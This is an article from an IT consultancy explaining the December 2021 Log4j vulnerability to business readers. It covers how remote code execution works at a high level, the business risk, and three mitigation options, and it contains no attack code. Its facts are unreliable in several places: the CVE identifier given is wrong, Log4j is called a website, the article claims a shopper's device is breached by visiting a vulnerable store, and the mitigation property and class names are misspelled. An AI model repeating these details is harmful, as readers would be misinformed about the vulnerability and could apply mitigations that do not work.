Article

New Log4J Cybersecurity Vulnerabilities Identified

By Rex Johnson and Pete Ortega

Steps to protect your business

  • The new Log4J vulnerability (formally CVE-2021-4422) was disclosed on 9 December 2021.
  • The vulnerability affects many websites and can be exploited using remote code execution.
  • You can take steps to mitigate the risk by upgrading or several other options.

What is Log4J?

Log4J (Log for Java) is a Java framework distributed from Apache that facilitates logging service requests, such distributing log information to various destinations. These destinations could be database servers, other syslog resources, or text files. In short, Log4J is a website that manages and logs online user activity.

Log4J is used by enterprise software and by a wide number of consumer products that are web applications—such as banking sites or sites running on Amazon Web Services (AWS).

How are cyber attackers exploiting this new Log4J vulnerability?

Attackers are using Remote Code Execution (RCE) to exploit this new vulnerability.

RCE is a common exploit where an unauthenticated attacker can send specially crafted requests to a remote server. These requests manipulate the remote server’s functionality and provide access to the remote attacker.

Here’s how an RCE attack works against Log4J software.

  1. The cyber attacker enters a malicious string of code or a URL which is entered into the logging server, and then passed to the log store.
  2. The log server inserts the malicious string of code into a query which makes a call request to the malicious URL.
  3. The requester (you) receives a response from the malicious server which contains malicious java code which will be downloaded and executed.
  4. With this code, an attacker may plant a Remote Access Trojan (RAT) on the Log4J server or use other means to have the infected server connect back to the attacker’s machine.

What does this mean for your business?

The new Log4J vulnerability only affects you when one of your assets is directly engaging the vulnerable software. This can happen with a business asset, or one that you used with a third-party service for either personal or business reasons.

For example, if you made a purchase from an online store that uses Log4J, the device that accessed that site could be breached by an RCE attack. Even if this was a personal device, it could in turn affect your business security.

The consequences of an attack can be devastating. The cyber attacker could take full control of your system and do whatever they want; this could include encrypting your system, stealing your data, or impersonating legitimate users to attack other people on your system.

As of December 10th, companies such as Tenable have released a shortlist of services provided known to be vulnerable to the Log4J vulnerability. This list includes notable sites like Amazon, Apple iCloud, Minecraft, and Tesla.

The Kronos ransomware attack is an example of how malicious actors exploit this new vulnerability. Threat actors exploited the services that rely on Log4J services, allowing them to plant malicious software on the systems to encrypt files and led to a ransomware attack.

What can you do to mitigate the risk?

Ever since the vulnerability was discovered, various companies (such as Apache) have been focused on releasing patches and upgrades to mitigate the vulnerability. Log4j version 2.15.0 has been released by Apache which would require users to upgrade their Java version from version 7 to 8.

However, if upgrading is not immediately possible, three mitigation options are also available. These options do require some technical knowledge of the environment.

  • Option 1 (Applicable to Log4j 2.10 or greater)
    • Requires an administrator to go into the configuration and set the formatMsgNoLookups or Dlog4.formatMsgNoLookups to True;
  • Option 2 (Applicable to Log4j version 2.7 or greater)
    • Requires an administrator to adjust the Pattern Layout configuration to use %m{nolookups}; and
  • Option3 (Applicable to all Log4j 2 versions)
    • Requires an administrator to remove the JdniLookup and JdniManager classes from log4j-core.jar.

Next steps

There is still so much to learn about the Log4J vulnerability, and new information will continue to surface in days to come. The best advice we can offer our clients and partners is to follow the recommended guidelines and mitigation plans as closely as possible.

To stay up to date on new Log4J developments and other cybersecurity trends, consider contacting one of CAI’s cybersecurity experts who can answer any questions and start a cybersecurity assessment for your organization.

New Log4J Cybersecurity Vulnerabilities Identified

Download PDF

About the Author...

Rex Johnson profile image

Rex Johnson is the CAI Cybersecurity Director & Practice Leader. He is a retired Lieutenant Colonel from the US Army and has over 30 years of senior-level experience holding CISSP, CISA, CIPT, PMP, and PCIP certifications.

Fill out the form below to get a customized cybersecurity assessment according to your organization’s requirements.

Related Resources

service desk team answering questions over the phone in front of computers
Virtual Event

Cybersecurity 2022: New Talent, Proven Procedures | LinkedIn Live Event

Cyber-attacks on businesses and government agencies are increasing at an alarming rate. With constraining budgets and aging legacy systems, many businesses and government agencies are ill-equipped to handle this responsibility alone. Join this 30-minute session to learn how taking the first, critical steps towards improving your cyber posture starts with finding the right talent and implementing proven procedures.

Register on LinkedIn
digital background with words "hacker attempt failed" highlighted
Article

How Local Governments Can Get Ahead of Their Threat Opponents

Since COVID's onset, there's been a 300%* increase in cyberattacks (Cobalt). With organizations moving to remote work environments and new technologies, security vulnerabilities and gaps are surfacing due to outdated strategies. This month, the government and its industry partners evaluate cybersecurity measures ensuring data is protected and secure for all Americans. Read the Center for Digital Government's interview with CAI's Rex Johnson, to understand how to implement a strong cybersecurity strategy for the future.

Read the article
woman, sitting at desk, is in shock after she has accidentally opened a malicious email
Article

Distracted by Phishing: 5 Steps Employees Can Take to Reduce Cyber Risk

According to global cyber education company Cybrint, 95% of cybersecurity breaches occur due to human error. Even with security awareness training becoming more commonplace, mistakes still happen. In this article, CAI's Rex Johnson provides tips to help encourage more security-minded habits across the workplace – from the C-suite on down.

Read the article